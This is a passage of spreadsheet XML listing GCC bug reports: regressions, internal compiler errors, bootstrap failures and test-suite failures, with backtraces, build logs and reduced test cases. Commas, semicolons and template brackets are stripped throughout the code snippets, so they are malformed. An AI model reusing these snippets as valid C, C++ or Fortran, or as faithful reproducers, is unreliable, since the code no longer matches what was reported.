/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c: In function 'void test_strcat(MemArrays*)':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:265:3: warning: 'char* strcat(char* const char*)' argument 2 declared attribute 'nonstring' [-Wstringop-overflow=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/c-c++-common/attr-nonstring-3.c:51:6: note: argument 'arr' declared here
/home/seurer/gcc/gcc-trunk/gcc/t</t>
  </si>
  <si>
    <t>GCC-64890</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/pr64809.c (test for excess errors)</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/pr64809.c (test for excess errors)
Excess errors:
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:4:1: warning: data definition has no type or storage class
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:4:1: warning: type defaults to 'int' in declaration of 'memcpy' [-Wimplicit-int]
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:4:1: warning: conflicting types for built-in function 'memcpy'
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:5:1: warning: data definition has no type or storage class
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:5:1: warning: type defaults to 'int' in declaration of 'memccpy' [-Wimplicit-int]
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:7:1: warning: data definition has no type or storage class
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:7:1: warning: type defaults to 'int' in declaration of 'strncpy' [-Wimplicit-int]
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:7:1: warning: conflicting types for built-in function 'strncpy'
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:8:1: warning: data definition has no type or storage class
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:8:1: warning: type defaults to 'int' in declaration of 'strcat' [-Wimplicit-int]
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:8:1: warning: conflicting types
 for built-in function 'strcat'/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:11:14: warning: no semicolon at
 end of struct or union/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:12:1: warning: data definition 
has no type or storage class/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:12:1: warning: type defaults to
 'int' in declaration of 'strerror' [-Wimplicit-int]/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:13:1: warning: data definition 
has no type or storage class/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:13:1: warning: type defaults to
 'int' in declaration of 'strerror_r' [-Wimplicit-int]/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:15:1: warning: data definition 
has no type or storage class/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:15:1: warning: type defaults to
 'int' in declaration of 'strerror_l' [-Wimplicit-int]/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:16:1: warning: data definition 
has no type or storage class/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:16:1: warning: type defaults to
 'int' in declaration of '__bzero' [-Wimplicit-int]/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:17:19: warning: type defaults to 'int' in declaration of 'bzero' [-Wimplicit-int]
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:17:19: warning: conflicting types for built-in function 'bzero'
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:20:1: warning: return type defaults to 'int' [-Wimplicit-int]
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:24:1: warning: data definition has no type or storage class
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:24:1: warning: type defaults to 'int' in declaration of '__strcspn_c2' [-Wimplicit-int]
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:25:19: warning: return type defaults to 'int' [-Wimplicit-int]
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:30:43: warning: type defaults to 'int' in declaration of 'p1' [-Wimplicit-int]
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:30:19: warning: return type defaults to 'int' [-Wimplicit-int]
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:32:12: warning: type defaults to 'int' in declaration of '__result' [-Wimplicit-int]
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:37:1: warning: return type defaults to 'int' [-Wimplicit-int]
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:39:12: warning: type defaults to 'int' in declaration of '__result' [-Wimplicit-int]
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr64809.c:44:1: warning: data definition has no type or storage class
etc.</t>
  </si>
  <si>
    <t>GCC-53017</t>
  </si>
  <si>
    <t>Integer constant expression not constant enough for vector_size</t>
  </si>
  <si>
    <t>In the following code s is apparently not an acceptable parameter for the vector_size attribute but s+0 is.
constexpr int s=32
typedef double VEC __attribute__ ((__vector_size__ (s
#ifndef BUG
        + 0
#endif
        )))
VEC a={2.3.4.}
$ g++ -std=c++0x v.cc -Wall -W -c -O3 
$ g++ -std=c++0x v.cc -Wall -W -c -O3 -DBUG
v.cc:6:4: warning: '__vector_size__' attribute ignored [-Wattributes]
v.cc:8:16: error: scalar object 'a' requires one element in initializer</t>
  </si>
  <si>
    <t>GCC-35024</t>
  </si>
  <si>
    <t>[4.3 regression] ICE with parameter pack in nested type</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE on mainline since today:
=============================================================
template int foo()
{
  typename T::X x
  return x
}
void bar()
{
  foo()
}
=============================================================
bug.cc: In function 'int foo()':
bug.cc:3: error: parameter packs not expanded with `...':
bug.cc:3: note:         'T'
bug.cc: In function 'int foo() [with T = int]':
bug.cc:9:   instantiated from here
bug.cc:3: internal compiler error: in dependent_type_p at cp/pt.c:15553
Please submit a full bug report [etc.]
The code is similar to PR35023 but crashes at a different position.</t>
  </si>
  <si>
    <t>GCC-65515</t>
  </si>
  <si>
    <t>[5 Regression] FAIL: gcc.c-torture/compile/limits-fndefn.c   -O2 -flto -flto-partition=none  (ICE) -- SIGSEGV for stack growth failure</t>
  </si>
  <si>
    <t>spawn /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ -fno-diagnostics
-show-caret -fdiagnostics-color=never -O2 -flto -flto-partition=none -w -c -o li
mits-fndefn.o /test/gnu/gcc/gcc/gcc/testsuite/gcc.c-torture/compile/limits-fndef
n.c
^MPid 26539 received a SIGSEGV for stack growth failure.^MPossible causes: insufficient memory or swap space^Mor stack size exceeded maxssiz. ^M
xgcc: internal compiler error: Segmentation fault (program cc1)Please submit a full bug reportwith preprocessed source if appropriate.
See  for instructions.
compiler exited with status 1
output is:
^M
Pid 26539 received a SIGSEGV for stack growth failure.^M
Possible causes: insufficient memory or swap space^M
or stack size exceeded maxssiz. ^M
xgcc: internal compiler error: Segmentation fault (program cc1)
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
FAIL: gcc.c-torture/compile/limits-fndefn.c   -O2 -flto -flto-partition=none  (internal compiler error)
FAIL: gcc.c-torture/compile/limits-fndefn.c   -O2 -flto -flto-partition=none  (test for excess errors)
Excess errors:
Pid 26539 received a SIGSEGV for stack growth failure.
Possible causes: insufficient memory or swap space
or stack size exceeded maxssiz. 
xgcc: internal compiler error: Segmentation fault (program cc1)
Similar fails:
FAIL: gcc.c-torture/compile/limits-fndefn.c   -O2 -flto  (internal compiler error)
FAIL: gcc.c-torture/compile/limits-fndefn.c   -O2 -flto  (test for excess errors)
This is with 16 MB stack:
# ulimit -s   
16384
On hppa-linux I've had to use a 32 MB stack to keep some tests from failing.
I marked this as a regression since r221487 and before didn't fail.</t>
  </si>
  <si>
    <t>GCC-7690</t>
  </si>
  <si>
    <t>gcc 2.95.3: argument destroyed under -O2 on IA32</t>
  </si>
  <si>
    <t>The stripped-down C code below generates IA32 assembly that destroys the name parameter before making another call but only when using -O2.
This code is simplified from a real program (squid) and no longer does anything useful on its own so you must look at the generated assembly.
I was hoping this is a known bug with a known fix that I can find somewhere so as to patch it.
Release:
gcc 2.95.3
Environment:
BSD/OS 4.3
How-To-Repeat:
typedef unsigned long long off_t
typedef unsigned int size_t
off_t f1(char *buf size_t sz const char *name)
void f2(int)
void bug(char *buf size_t sz const char *name unsigned type)
{
    off_t off
    off = f1(buf sz name)
    memcpy(buf + off 
    f2(off &lt;= sz)
}
compile with -O2 examine assembly note this section:
        movl 8(%ebp)%edi
        movl 12(%ebp)%eax
        xorl %edx%edx
        movl %eax12(%ebp)
        movl %edx16(%ebp)
note that 16(%ebp) used to hold the parameter name before this last movl which (since %edx is now 0) clobbers it.
Using -O1 -fexpensive-optimizations appears to suffice to trigger the problem (but -O1 alone does not).</t>
  </si>
  <si>
    <t>torek</t>
  </si>
  <si>
    <t>GCC-81638</t>
  </si>
  <si>
    <t>[8 Regression] AIX bootstrap failure due to Recover GOTO predictor</t>
  </si>
  <si>
    <t>The patch breaks bootstrap on AIX and probably is a hidden bug on all targets.
With the patch libbacktrace/xcoff.c fails to compile with the error:
/nasfarm/edelsohn/src/src/libbacktrace/xcoff.c: In function 'xcoff_add':
/nasfarm/edelsohn/src/src/libbacktrace/xcoff.c:822:13: error: 'incl'
may be used uninitialized in this function
[-Werror=maybe-uninitialized]
    filename = incl-&gt;filename
    ~~~~~~~~~^~~~~~~~~~~~~~~~
/nasfarm/edelsohn/src/src/libbacktrace/xcoff.c:777:22: note: 'incl'
was declared here
   struct xcoff_incl *incl
                      ^~~~
incl is used immediately above the line that produces the warning --
with no warning.</t>
  </si>
  <si>
    <t>GCC-70014</t>
  </si>
  <si>
    <t>[ARM] Predicate does not match constraint (*subsi3_carryin_const)</t>
  </si>
  <si>
    <t>The predicate of operand 1 of the *subsi3_carryin_const pattern:
(define_insn *subsi3_carryin_const
  [(set (match_operand:SI 0 s_register_operand =r)
        (minus:SI (plus:SI (match_operand:SI 1 reg_or_int_operand r)
                           (match_operand:SI 2 arm_not_operand K))
                  (ltu:SI (reg:CC_C CC_REGNUM) (const_int 0))))]
allows for const_int but the constraint only allows for registers. The solution is to change the predicate to disallow const_int operands. I will post a patch upstream after testing is complete.</t>
  </si>
  <si>
    <t>michael.collison</t>
  </si>
  <si>
    <t>GCC-2415</t>
  </si>
  <si>
    <t>ICE (regression 2.95.2-&gt;gcc3.0) when compiling pow from fdlibm</t>
  </si>
  <si>
    <t xml:space="preserve">	When compiling __ieee754_pow gcc 3.0 (compiled from CVS checkout
    verified with online test compiler for 20010327 snapshot)
    the compiler ICE's at -O2 (previous versions produced incorrect code).
Release:
3.0 20010328 (prerelease)
Environment:
System: Linux bart 2.2.17 #2 Tue Mar 13 22:44:15 GMT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../configure --prefix /local/cross/i386/gcc-3.0
How-To-Repeat:
	I have tried stripping down the function as far as possible. The result
    is inserted below. Compile with
    gcc -O2 -o printpow printpow.i
    and you will get
printpow.i: In function `__ieee754_pow':
printpow.i:75: Unable to find a register to spill in class `AREG'.
printpow.i:75: This is the insn:
(insn 209 79 82 (set (subreg:SI (reg/v:DF 15 st(7) [76]) 0)
        (const_int 0 [0x0])) 35 {*movsi_1} (nil)
    (nil))
printpow.i:75: confused by earlier errors bailing out
The file [Note: This has been stripped down aggressively by deleting
blocks of code so might no longer make sense.]:
double __ieee754_pow(double x
                     double y)
{
    double z
        ax
        z_h
        z_l
        p_h
        p_l
    double y1
        t1
        t2
        r
        s
        t
        u
        v
        w
    int i
        j
        k
        yisint
        n
    int hx
        hy
        ix
        iy
    unsigned lx
        ly
    if (0)
    {
    }
    else
    {
        double s2
            s_h
            s_l
            t_h
            t_l
        if (ix &lt; 0x00100000)
        {
            ax *= 0
            n -= 53
            ix = (*(1+(int*)
        }
        n += ((ix) &gt;&gt; 20) - 0x3ff
        (*(int*)
        r += s_l * (s_h + s)
        s2 = s_h * s_h
        t_h = 3.0 + s2 + r
        (*(int*)
        t_l = r - ((t_h - 3.0) - s2)
        u = s_h * t_h
        v = s_l * t_h + t_l * s
        p_h = u + v
        (*(int*)
        p_l = v - (p_h - u)
        z_h = 0
        z_l = p_h + p_l
        t = (double) n
        t1 = (((z_h + z_l)) + t)
        (*(int*)
        t2 = z_l - (((t1 - t)) - z_h)
    }
    y1 = y
    (*(int*)
    p_l = (y - y1) * t1 + y * t2
    p_h = y1 * t1
    z = p_l + p_h
    return s * z
}</t>
  </si>
  <si>
    <t>jan.vroonhof</t>
  </si>
  <si>
    <t>GCC-5147</t>
  </si>
  <si>
    <t>[cygwin] Failure of test gcc.dg/special/wkali-1.c</t>
  </si>
  <si>
    <t>Test gcc.dg/special/wkali-1.c fails with error:
/gcc/testsuite/gcc.dg/special/wkali-1.c:5: warning: weak declaration of `foo' not supported
I believe the test should be UNSUPPORTED if weak symbols aren't supported.  
Patch is
http://gcc.gnu.org/ml/gcc-patches/2001-12/msg02017.html
Release:
gcc 3.1 2001-12-18
Environment:
i686-pc-cygwin</t>
  </si>
  <si>
    <t>GCC-48804</t>
  </si>
  <si>
    <t>[4.7 Regression] Bootstrap compare failure</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 173064 gave:
Comparing stages 2 and 3
warning: gcc/cc1obj-checksum.o differs
warning: gcc/cc1plus-checksum.o differs
warning: gcc/cc1-checksum.o differs
Bootstrap comparison failure!
gcc/gimplify.o differs
make[5]: *** [compare] Error 1
The miscompiled file seems random.</t>
  </si>
  <si>
    <t>GCC-65409</t>
  </si>
  <si>
    <t>[4.8/4.9/5 Regression] ICE in store_field</t>
  </si>
  <si>
    <t>Created attachment 35022
ICE-triggering source.
I get an ICE with the attached source from version 4.8 on to the head of the Git repository.
Output of Git's cc1plus:
 Foo::Foo() Foo::Foo() Foo::Foo() Bar::Bar(U) Bar::Bar(U) [with U = Foo T = Foo] Bar::Bar(U) [with U = Foo T = Foo] Bar::Bar(U) [with U = Foo T = Foo] void __static_initialization_and_destruction_0(int int) void _GLOBAL__sub_I_a()
Analyzing compilation unit
Performing interprocedural optimizations
        Assembling functions:
 Foo::Foo() Bar::Bar(U) [with U = Foo T = Foo]
: In constructor â€˜Bar::Bar(U) [with U = Foo T = Foo]â€™:
:14:27: internal compiler error: in store_field at expr.c:6660
0x9cf46f store_field
	../../gcc/expr.c:6659
0x9d4d10 expand_assignment(tree_node* tree_node* bool)
	../../gcc/expr.c:5000
0x8d5dee expand_call_stmt
	../../gcc/cfgexpand.c:2388
0x8d5dee expand_gimple_stmt_1
	../../gcc/cfgexpand.c:3334
0x8d5dee expand_gimple_stmt
	../../gcc/cfgexpand.c:3488
0x8dc118 expand_gimple_basic_block
	../../gcc/cfgexpand.c:5500
0x8dd9f7 execute
	../../gcc/cfgexpand.c:6118
When uncommenting the commented-out fourth attribute of Foo the ICE goes away.</t>
  </si>
  <si>
    <t>GCC-3318</t>
  </si>
  <si>
    <t>GCC-M68k: compiler for target m68k-elf fails to build</t>
  </si>
  <si>
    <t>Compiler fails to build. Failure log snippet below:
/home/tm/gcc-3.0-m68k-elf/gcc/xgcc -B/home/tm/gcc-3.0-m68k-elf/gcc/ -B/usr/local/m68k-elf/bin/ -B/usr/local/m68k-elf/lib/ -isystem /usr/local/m68k-elf/include -DCROSS_COMPILE -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./include  -I. -I. -I../../gcc-3.0/gcc -I../../gcc-3.0/gcc/. -I../../gcc-3.0/gcc/config -I../../gcc-3.0/gcc/../include  -g0 \
  -finhibit-size-directive -fno-inline-functions \
  -fno-exceptions  -Dinhibit_libc \
  -c ../../gcc-3.0/gcc/crtstuff.c -DCRT_BEGIN -o crtbegin.o
../../gcc-3.0/gcc/crtstuff.c: In function `__do_global_dtors_aux':
../../gcc-3.0/gcc/crtstuff.c:225: Internal compiler error in expected_value_to_br_prob at predict.c:303
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
3.0
Environment:
host: i686-linux (Red Hat 7.0)
target: m68k-elf
How-To-Repeat:
../gcc-3.0/configure --target=m68k-elf</t>
  </si>
  <si>
    <t>GCC-64938</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE in symtab_remove_unreachable_nodes at ipa.c:547 on arm-linux-gnueabihf</t>
  </si>
  <si>
    <t>Created attachment 34668
test case
$ arm-linux-gnueabihf-gcc -c -g -O2 -std=c++11 -Wno-attributes -Wno-non-template-friend test.ii 
test.ii:66:53: internal compiler error: in symtab_remove_unreachable_nodes at ipa.c:547
 H Scopes::favScopes() const { return m_scopes }
                                                     ^
Please submit a full bug report
with preprocessed source if appropriate.
configured with --with-arch=armv7-a --with-fpu=vfpv3-d16 --with-float=hard --with-mode=thumb
not seen on the trunk introduced by backporting the fix for PR63970. Reverting this backport lets the test case build.</t>
  </si>
  <si>
    <t>GCC-70937</t>
  </si>
  <si>
    <t>[7 Regression] ICE: tree code â€˜ssa_nameâ€™ is not supported in LTO streams</t>
  </si>
  <si>
    <t>overnight regression in trunk:
&gt; cat bug.f90 
  SUBROUTINE dbcsr_test_read_args(narg args)
    CHARACTER(len=*) DIMENSION(:) &amp;
      INTENT(out)         :: args
    CHARACTER(len=80)     :: line
    DO
       args(narg) = line
    ENDDO
  END SUBROUTINE dbcsr_test_read_args
&gt; gfortran -flto -c -O0 bug.f90 
bug.f90:8:0: internal compiler error: tree code â€˜ssa_nameâ€™ is not supported in LTO streams
   END SUBROUTINE dbcsr_test_read_args
0xa62703 DFS::DFS(output_block* tree_node* bool bool bool)
	../../gcc/gcc/lto-streamer-out.c:676
0xa6338b lto_output_tree(output_block* tree_node* bool bool)
	../../gcc/gcc/lto-streamer-out.c:1616
0xa5960d write_global_stream
	../../gcc/gcc/lto-streamer-out.c:2415
0xa5960d lto_output_decl_state_streams(output_block* lto_out_decl_state*)
	../../gcc/gcc/lto-streamer-out.c:2462
0xa60fa4 produce_asm_for_decls()
	../../gcc/gcc/lto-streamer-out.c:2839
0xacd65f write_lto
	../../gcc/gcc/passes.c:2459
0xad08ae ipa_write_summaries_1
	../../gcc/gcc/passes.c:2520
0xad08ae ipa_write_summaries()
	../../gcc/gcc/passes.c:2580
0x7a6059 ipa_passes
	../../gcc/gcc/cgraphunit.c:2310
0x7a6059 symbol_table::compile()
	../../gcc/gcc/cgraphunit.c:2404
0x7a880d symbol_table::finalize_compilation_unit()
	../../gcc/gcc/cgraphunit.c:2564
Please submit a full bug report</t>
  </si>
  <si>
    <t>GCC-10682</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] chokes on a typedef for an enum inside a class template</t>
  </si>
  <si>
    <t>#ifdef CLUNK
template
#endif
class Foo {
public:
  enum xyzzy {abc}
  typedef xyzzy Xyzzy
}
class Bar {
  void baz(Foo
#ifdef CLUNK
#endif
  ::Xyzzy x)  // error: `Xyzzy' is not a member of type `Foo'
}
Release:
gcc (GCC) 3.3 20030226 (prerelease) (SuSE Linux)
Environment:
Intel clone
Linux SuSE 8.2 distro out-of-the-box
How-To-Repeat:
gcc -DCLUNK hitTheBug.C</t>
  </si>
  <si>
    <t>GCC-60697</t>
  </si>
  <si>
    <t>[aarch64] LRA ICE (Segfault) while building 435.gromacs</t>
  </si>
  <si>
    <t>Created attachment 32474
Reduced testcase
AArch64 compiler ICEs when building SPEC2k6.
besttry.c:393:1: internal compiler error: Segmentation fault
 }
 ^
0x9d311f crash_signal
        $TOP/gcc/gcc/toplev.c:337
0x8c73af base_plus_disp_to_reg
        $TOP/gcc/gcc/lra-constraints.c:2630
0x8c9f80 process_address
        $TOP/gcc/gcc/lra-constraints.c:2942
0x8cd10c curr_insn_transform
        $TOP/gcc/gcc/lra-constraints.c:3230
0x8cfebc lra_constraints(bool)
        $TOP/gcc/gcc/lra-constraints.c:4175
0x8c0e23 lra(_IO_FILE*)
        $TOP/gcc/gcc/lra.c:2353
0x88215e do_reload
        $TOP/gcc/gcc/ira.c:5457
0x88215e rest_of_handle_reload
        $TOP/gcc/gcc/ira.c:5598
0x88215e execute
        $TOP/gcc/gcc/ira.c:5627
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Reduced testcase is attached.
Fails with -O3 -mcpu=cortex-a53. Doesn't ICE with -O2</t>
  </si>
  <si>
    <t>GCC-5504</t>
  </si>
  <si>
    <t>Optimization breaks wei-ku-1 from blitz</t>
  </si>
  <si>
    <t>Optimization breaks wei-ku-1.cpp from the
blitz-20001213/testsuite. After consuming all virtual memory about
417 Mb the compilation is killed by the kernel.  
It worked about three weeks ago when I last tried.
Release:
3.1 20020126 (experimental)
Environment:
System: Linux kiste 2.4.17 #7 Thu Jan 3 17:21:51 CET 2002 i686 unknown
Architecture: i686
SuSE 7.3
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads --enable-languages=cc++f77objc
How-To-Repeat:
Source code wei-ku-1.cpp
#include testsuite.h
#include 
BZ_USING_NAMESPACE(blitz)
int main()
{
  BZ_USING_NAMESPACE(blitz::tensor)
  Range all = Range::all()
  {
    Array A(65432)
    int ld_begin = 1
    int ld_end = 3
    Array B(65232)
    A = 11111 + 10000*i + 1000*j + 100*k + 10*l + m
    B = A(all all Range(ld_begin ld_end-1) all all)
    // cout &lt;&lt; B &lt;&lt; endl    
    BZTEST(B(00000) == 11211)
    BZTEST(B(11111) == 22322)
    BZTEST(B(54121) == 65332)
  }
  {
    Array B(1012566)
    Array A(10112566)
    int ld_begin = 1 ld_end = 26
    A = 11111 + 10000*i + 1000*j + 100*k + 10*l + m
    B = A(all all Range(ld_begin ld_end-1) all all)
    BZTEST(B(00000) == 11211)
    BZTEST(B(10111) == 21322)
    BZTEST(B(50345) == 61556)
  }
  return 0
}
Compiling wei-ku-1.cpp
 g++ -v -O -I./.. -c ./wei-ku-1.cpp -save-temps
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads --enable-languages=cc++f77objc
Thread model: posix
gcc version 3.1 20020126 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cpp0 -lang-c++ -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -I./.. -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__OPTIMIZE__ -D__STDC_HOSTED__=1 -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ ./wei-ku-1.cpp wei-ku-1.ii
GNU CPP version 3.1 20020126 (experimental) (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory NONE/include
ignoring nonexistent directory /usr/local/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 ..
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/i686-pc-linux-gnu
 /usr/local/include/g++-v3/backward
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/include
 /usr/include
End of search list.
In file included from /usr/local/include/g++-v3/backward/strstream:51
                 from ../blitz/array/fastiter.h:41
                 from ../blitz/array.h:2462
                 from wei-ku-1.cpp:2:
/usr/local/include/g++-v3/backward/backward_warning.h:32:2: warning: #warning This file includes at least one deprecated or antiquated header. Please consider using one of the 32 headers found in section 17.4.1.2 of the C++ standard. Examples include substituting the  header for the  header for C++ includes or  instead of the deprecated header . To disable this warning use -Wno-deprecated.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cc1plus -fpreprocessed wei-ku-1.ii -quiet -dumpbase wei-ku-1.cpp -O -version -o wei-ku-1.s
GNU CPP version 3.1 20020126 (experimental) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.1 20020126 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 3.1 20020126 (experimental).
g++: Internal error: Killed (program cc1plus)
Please submit a full bug report.
See  for instructions.
Uuencoded and bzip2 compressed preprocessed source code</t>
  </si>
  <si>
    <t>GCC-52666</t>
  </si>
  <si>
    <t>[4.8 Regression] FAIL: scal-to-vec1.c</t>
  </si>
  <si>
    <t>For the test case gcc.c-torture/execute/scal-to-vec1.c there is new FAILs:
FAIL: gcc.c-torture/execute/scal-to-vec1.c execution  -O0 
FAIL: gcc.c-torture/execute/scal-to-vec1.c execution  -O1 
FAIL: gcc.c-torture/execute/scal-to-vec1.c execution  -O2 
pointer 
FAIL: gcc.c-torture/execute/scal-to-vec1.c execution  -O3 -fomit-frame-pointer 
FAIL: gcc.c-torture/execute/scal-to-vec1.c execution  -O3 -fomit-frame-pointer -funroll-loops 
FAIL: gcc.c-torture/execute/scal-to-vec1.c execution  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions 
FAIL: gcc.c-torture/execute/scal-to-vec1.c execution  -O3 -g 
FAIL: gcc.c-torture/execute/scal-to-vec1.c execution  -Os 
FAIL: gcc.c-torture/execute/scal-to-vec1.c execution  -O2 -flto -fno-use-linker-plugin -flto-partition=none 
FAIL: gcc.c-torture/execute/scal-to-vec1.c execution  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects 
GCC from SVN trunk 185603
It was created by configure which was
generated by GNU Autoconf 2.64.  Invocation command line was
  $ ../../gcc.gnu.org/trunk/configure --target=avr
--prefix=/local/gnu/install/gcc-4.7 --disable-nls --with-dwarf2
--enable-checking=yesrtl --enable-languages=cc++
With GCC from r185059 the test case passed.</t>
  </si>
  <si>
    <t>GCC-4810</t>
  </si>
  <si>
    <t>Problem with template arguments</t>
  </si>
  <si>
    <t>Failure to compile a template ( internal compiler error)
Release:
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
Environment:
Linux/Unix
How-To-Repeat:
running a stub extracted from the attached file</t>
  </si>
  <si>
    <t>ashoka</t>
  </si>
  <si>
    <t>GCC-54559</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] ICE in gimplify_expr at gimplify.c:7592</t>
  </si>
  <si>
    <t>fails with r191092 worked with r190380 on the 4.7 branch taken from a cython testcase with -O[0-3]:
$ gcc -c -g -O0 -I/usr/include/python2.7 pyx.c
pyx.c: In function '__pyx_t_long_double_complex_from_parts':
pyx.c:14:16: internal compiler error: in gimplify_expr at gimplify.c:7592
Please submit a full bug report
with preprocessed source if appropriate.
typedef struct {
    double real
    double imag
} Py_complex
typedef struct _object {
    unsigned int refcnt
} PyObject
typedef long double _Complex __pyx_t_long_double_complex
static __inline__ __pyx_t_long_double_complex
__pyx_t_long_double_complex_from_parts(long double x long double y)
{
    return x + y*(__pyx_t_long_double_complex)(__extension__ 1.0iF)
}
static __pyx_t_long_double_complex
__Pyx_PyComplex_As___pyx_t_long_double_complex(PyObject* o) {
    Py_complex cval
    return __pyx_t_long_double_complex_from_parts(
               (long double)cval.real
               (long double)cval.imag)
}</t>
  </si>
  <si>
    <t>GCC-8521</t>
  </si>
  <si>
    <t>[3.4-bib] Bootstrap failure on irix6.5 - .gpword expression references global symbol</t>
  </si>
  <si>
    <t>Bootstrap of 3.4 basic improvement branch on mips-sgi-irix6.5 fails with CVS of Sun Nov 10 00:31:06 2002 UTC.
It was ok on Wed Oct 23 06:09:42 2002 UTC.
stage1/xgcc -Bstage1/ -B/exd6/billingd/tmp/gcc-3.4-bib/mips-sgi-irix6.5/bin/ -c   -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wtraditional -pedantic -Wno-long-long -fno-common  -DHAVE_CONFIG_H -DGENERATOR_FILE    -I. -I. -I/exd2/billingd/src/gcc-3.4-bib/gcc -I/exd2/billingd/src/gcc-3.4-bib/gcc/. -I/exd2/billingd/src/gcc-3.4-bib/gcc/config -I/exd2/billingd/src/gcc-3.4-bib/gcc/../include /exd2/billingd/src/gcc-3.4-bib/gcc/scan-decls.c -o scan-decls.o
as: Error: /var/tmp//ccb1SDMa.s line 466: .gpword expression references global symbol
as: Error: /var/tmp//ccb1SDMa.s line 467: .gpword expression references global symbol
Release:
unknown
Environment:
mips-sgi-irix6.5</t>
  </si>
  <si>
    <t>GCC-37733</t>
  </si>
  <si>
    <t>GCC Bootstrap fails in Stage 2 AIX 5.2</t>
  </si>
  <si>
    <t>build/genattr /mtg/arc/gcc-4.3.2/gcc/config/rs6000/rs6000.md \
	  insn-conditions.md &gt; tmp-attr.h
/mtg/TOOL/powerpc-AIX5.2/bin/bash /mtg/arc/gcc-4.3.2/gcc/../move-if-change tmp-attr.h insn-attr.h
echo timestamp &gt; s-attr
